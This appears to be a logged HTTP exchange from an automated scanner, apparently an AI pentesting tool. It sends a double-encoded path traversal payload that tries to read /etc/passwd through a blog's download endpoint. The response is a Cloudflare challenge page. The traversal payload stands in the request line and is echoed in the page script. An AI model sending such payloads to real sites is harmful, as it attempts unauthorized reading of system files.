REQUEST:
GET https://my.myfirst.tech/blogs/latest/cara-buat-duit-online-malaysia-5-kaedah-yang-ramai-tak-tahu/download?filename=%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2Fetc%2Fpasswd
User-Agent: pentest-ai/0.11 (+https://pentestai.xyz)



RESPONSE:
HTTP 429
Date: Fri, 17 Jul 2026 09:31:16 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 9944
Connection: close
Accept-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cf-Mitigated: challenge
X-Frame-Options: SAMEORIGIN
Server: cloudflare
Critical-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=(),xr-spatial-tracking=*
Referrer-Policy: same-origin
Server-Timing: chlray;desc="a1c83b9419eba110"
X-Content-Type-Options: nosniff
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=e8H2fFa%2FmeViSfmaMdi80ZEOOkpno%2Bx3hR6UJvH43xpCkKe27N8DI7W%2BGoOTIIpVmzLZzfxx7mKs4sLkoq29tNg%2FWs7cdoIBXwWPhAT8aTnEZTxSyxYbaKtw%2B0XUrp4xIg%3D%3D"}]}
Nel: {"report_to":"cf-nel","success_fraction":0.01,"max_age":604800}
X-XSS-Protection: 1; mode=block
X-Permitted-Cross-Domain-Policies: none
X-Download-Options: noopen
CF-RAY: a1c83b9419eba110-SIN
alt-svc: h3=":443"; ma=86400

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Verifying your connection...</title>

    <style type="text/css">
        *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#FFF;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}svg{width:40%}a:hover{border-bottom-color:#A9A9A9}h1{font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem;margin:auto}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-block;font-size:1.5rem;transition:border-color 0.2s ease-in}.action:hover{border-color:#000}@media all and (min-width:500px){.text-container--main{align-items:start}.page{padding:7.5rem 10.5rem}}
    </style>
<meta http-equiv="refresh" content="360"></head>

<body>
  <div class="page">
    <div class="text-container text-container--main">
      <div>
        <h1 data-i18n="content-title">Your connection needs to be verified before you can proceed</h1>
        <div class="cf-injected-html"><div class="main-wrapper" role="main"><div class="main-content"><noscript><div class="h2"><span id="challenge-error-text">Enable JavaScript and cookies to continue</span></div></noscript></div></div><script>(function(){window._cf_chl_opt = {cFPWv: 'b',cH: 'h_Dxefobg6zkIrIesvoMHwLsExrxkMpkqaH.qGl_olk-1784280676-1.2.1.1-yJwMtUrPSZaJiZGHYW4Yvujcc78e20NQ2O4ZjWr7pigkdu1zLnjOQ207L.ha2khL',cITimeS: '1784280676',cRay: 'a1c83b9419eba110',cTplB: '0',cTplC:1,cTplO:0,cTplV:5,cType: 'managed',cUPMDTk:"/blogs/latest/cara-buat-duit-online-malaysia-5-kaedah-yang-ramai-tak-tahu/download?filename=%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2Fetc%2Fpasswd\u0026__cf_chl_tk=QcP8xC_O1rd9pUr_V4Lf3.ahYdHCxGd356YOry1O_ZE-1784280676-1.0.1.1-ZX_BFc4yYqJN7bGcOyW.XlEUQoG1p5EnWNPNTuhkqSo",cvId: '3',cZone: 'my.myfirst.tech',fa:"/blogs/latest/cara-buat-duit-online-malaysia-5-kaedah-yang-ramai-tak-tahu/download?filename=%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2Fetc%2Fpasswd\u0026__cf_chl_f_tk=QcP8xC_O1rd9pUr_V4Lf3.ahYdHCxGd356YOry1O_ZE-1784280676-1.0.1.1-ZX_BFc4yYqJN7bGcOyW.XlEUQoG1p5EnWNPNTuhkqSo",md: 'AV_iKnPgm0gWUaJYZGWm3jOPL7N2pAygga3BiNneV2c-1784280676-1.2.1.1-6wRIiFi.EwSWpaBqvVH14TqJ8wXJhgvfECSeykRoyhGOyohqhIUJYNKFKQoY7DqWzZvv8HSGLJYtDR_xeQOYn4KUpBPQEvuzPRqM.7YqzRSGlBPRn939W6hJyw9213P_rfmqMZfuA03gM0uJ9YA3EuXU2CzLArP9MUtHUV0FPphCLCYQ2.95UrXc6M8ibi2xSlo2kJFE5KKfhMP15po4KzKzuHd._ucbRmiA6iDBKAjcrvdZtfoZMD6CxyHVbiQNCozTfuv1bO0rxQCzk27rdRHqcWIxVLCx0ZYhd_ArOKMo75Bzb6EN3MSpRMhmRniMCZyfUphCDEBoE1LaLr6fushWolG9XdII6x7HQ2FbE4mewIcN1sCWR41TpnpXN44pQdWPhctRnaVCuZF1S.X2ePzGestySUFi7qjJhsFH1vpcuxh_y2OvoEihtCJeVpm3h.zN7drhXC2SSiMTgxuYUcGEBGsic1RbdISKhSFxNXutwQFNCVyFvIBmGyWn0Kw3nyvELe.AwBesJgCnvFCga7C1IkDaFj5ALqWVO.n6d7CgkE2Ku9CM6oOtAUA9n3oHxExfrZeEYZxJ_yfDQ3u9tt8V3i537jY20TIl9FtHf0OYm6UdiXYlxJXw0knPhZwXp6..521Ew6vF0TJvfETYqLfoiUggXeL.K420a0vpAUcggJDU1NzqpySzugLCDKOAzqPkOkH3.kHWCuoYvjJcpz2nHl5LvcDvrLciTiFcK8Tl6iqoeZ7wl.NfVDz0_6eLOmV1bbBsy.F2Irzcr_eutoUU2f1b3Az9VmHN0f9PcFLMz5NzFQJW4UjVfDwscsCeSEFjv1k.ELlX84nBSgf1vVhcdgJxzR9PgbCLSI4ZjUXJprBpgeqvqNkYZEQv.Jpptv1v7z67aHYSoG7RiNvycO47wMDuRNGmo2MaxtzAFdjiMUC8_Iy4AFjPXguuLYvvPIj8zjnpUL7dz13ukO9Q2GDA0UqD8BeOsGY3Y7aK3t0ek2_rH2FQQ4s2CYe1SCuoK8E9AUWmiE3SM8F5.bs.PwBVX3neSqJzCrS9AMlOzNzwZJuEGZZrZmAxd7fHjd.vJ7zu34VzyXN6_TqLqzhSWiq8eoftC3r.Ed8bmkaFB6ZzG0vn12ZPKi.mUAodzO9KoOXAmNvQfp2WHcVVFi.GCtGuJGg8bSKtt2Y2gqSU5Pvq.ONY8UKzeZdPHLnHy6P.udIyuISf1NTTv0ffu8Fpy_PBZZqLCy4EQi1rE8BbskxtJvFG4cRRU4RbvKa3K5TgvRe6iC4XqeNzcUFeMiPrmsrmhdu4FkSsyi_BLg_rd3VkqtlKsxLUfly3GyGjEf1faOqUkIdVjJwzsu.SX2HcBWOGdNZ0OR2jWCjTGky6LNo',mdrd: 'D7Y61aMrTsmqOuryaJ9INSrqheWKebdOwQE2Pb_yHYo-1784280676-1.2.1.1-8Zt5KGIn2B7jz3rna1PWNravROlwRbu4Chde8Aygx9kfkEJfYCHPJVcgOcLI0JaIH.tamj2SYqrlPoAWxebZQhXRFOqQ7zb.i.4NBTz20nXa9T_33Rve2AC8X6_hyBwipWJ_XlZjqemJJREDV2ru2NzzooWFbjZ0WsA5qGlE4fAGW3C7Ppq4ZxWKCkmJZTPTVbm5xYWNOD32GYgdi2I2QSNwPEZI8gmfDthqZtBGMiCW0W06.KYCW0ua2T9Hl7RF',};var a = document.createElement('script');a.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=a1c83b9419eba110';window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;if (window.history && window.history.replaceState) {var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;history.replaceState(null, null,"/blogs/latest/cara-buat-duit-online-malaysia-5-kaedah-yang-ramai-tak-tahu/download?filename=%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2Fetc%2Fpasswd\u0026__cf_chl_rt_tk=QcP8xC_O1rd9pUr_V4Lf3.ahYdHCxGd356YOry1O_ZE-1784280676-1.0.1.1-ZX_BFc4yYqJN7bGcOyW.XlEUQoG1p5EnWNPNTuhkqSo"+ window._cf_chl_opt.cOgUHash);a.onload = function() {history.replaceState(null, null, ogU);}}document.getElementsByTagName('head')[0].appendChild(a);}());</script></div>
      </div>
    </div>
  </div>

  <script>
    var t = {
  "cs": {
    "title": "Vaše připojení se ověřuje...",
    "content-title": "Než budete moct pokračovat, je nutné ověřit vaše připojení"
  },
  "da": {
    "title": "Bekræfter din forbindelse ...",
    "content-title": "Din forbindelse skal bekræftes, før du kan fortsætte"
  },
  "de": {
    "title": "Deine Verbindung wird verifiziert ...",
    "content-title": "Deine Verbindung muss verifiziert werden, bevor du fortfahren kannst"
  },
  "en": {
    "title": "Verifying your connection...",
    "content-title": "Your connection needs to be verified before you can proceed"
  },
  "es": {
    "title": "Verificando la conexión...",
    "content-title": "Se debe verificar tu conexión antes de poder continuar"
  },
  "fi": {
    "title": "Yhteyttäsi todennetaan...",
    "content-title": "Yhteytesi on todennettava ennen kuin voit jatkaa"
  },
  "fr": {
    "title": "Connexion en cours de vérification...",
    "content-title": "Votre connexion doit être vérifiée avant que vous puissiez continuer"
  },
  "hi": {
    "title": "आपका कनेक्शन वेरिफ़ाई हो रहा है...",
    "content-title": "इससे पहले कि आप आगे बढ़ें आपके कनेक्शन को वेरिफ़ाई करना होगा"
  },
  "it": {
    "title": "Verifica connessione...",
    "content-title": "È necessario verificare la tua connessione prima di procedere"
  },
  "ja": {
    "title": "接続を確認しています...",
    "content-title": "続行するには接続の確認が必要です"
  },
  "ko": {
    "title": "연결 확인 중...",
    "content-title": "계속 진행하려면 연결을 확인해야 합니다."
  },
  "ms": {
    "title": "Mengesahkan sambungan anda...",
    "content-title": "Sambungan anda perlu disahkan sebelum anda boleh meneruskan"
  },
  "nb": {
    "title": "Bekreft tilkoblingen din …",
    "content-title": "Tilkoblingen din må bekreftes før du kan fortsette"
  },
  "nl": {
    "title": "Je verbinding verifiëren...",
    "content-title": "Verifieer eerst je verbinding voordat je doorgaat"
  },
  "pl": {
    "title": "Weryfikowanie połączenia...",
    "content-title": "Możesz kontynuować, dopiero gdy połączenie zostanie zweryfikowane"
  },
  "pt-BR": {
    "title": "Verificando a conexão...",
    "content-title": "A conexão precisa ser verificada para você prosseguir"
  },
  "pt-PT": {
    "title": "A verificar a sua ligação...",
    "content-title": "A sua ligação tem de ser verificada antes de prosseguir"
  },
  "sv": {
    "title": "Verifierar din anslutning ...",
    "content-title": "Din anslutning måste verifieras innan du kan fortsätta"
  },
  "th": {
    "title": "ตรวจสอบยืนยันการเชื่อมต่อของคุณ...",
    "content-title": "การเชื่อมต่อของคุณต้องได้รับการตรวจสอบยืนยันก่อนจึงจะดำเนินการต่อได้"
  },
  "tr": {
    "title": "Bağlantınız doğrulanıyor...",
    "content-title": "Devam etmeden önce bağlantınızın doğrulanması gerekir."
  },
  "vi": {
    "title": "Đang xác minh kết nối...",
    "content-title": "Bạn cần xác minh kết nối để có thế tiếp tục"
  },
  "zh-CN": {
    "title": "正在验证您的连接...",
    "content-title": "您的连接需要经过验证然后您才能继续操作"
  },
  "zh-TW": {
    "title": "正在驗證連線...",
    "content-title": "您必須先驗證連線才能繼續"
  }
};
    var language = navigator.languages && navigator.languages[0] || // Chrome / Firefox
      navigator.language ||   // All browsers
      navigator.userLanguage || // IE <= 10
      "en";
    language = language.split("-")[0]; // Strip country code
    translations = t[language] || t["en"];
    // Replace content on screen
    for (var id in translations) {
      target = document.querySelector("[data-i18n=" + id + "]");
      if (target != undefined) {
        target.innerHTML = translations[id];
      }
    }
    // Replace title tage
    document.title = translations["title"];
    // Replace language tag
    if (t[language]) { document.getElementsByTagName('html')[0].setAttribute('lang', language); };
  </script>
</body>
</html>
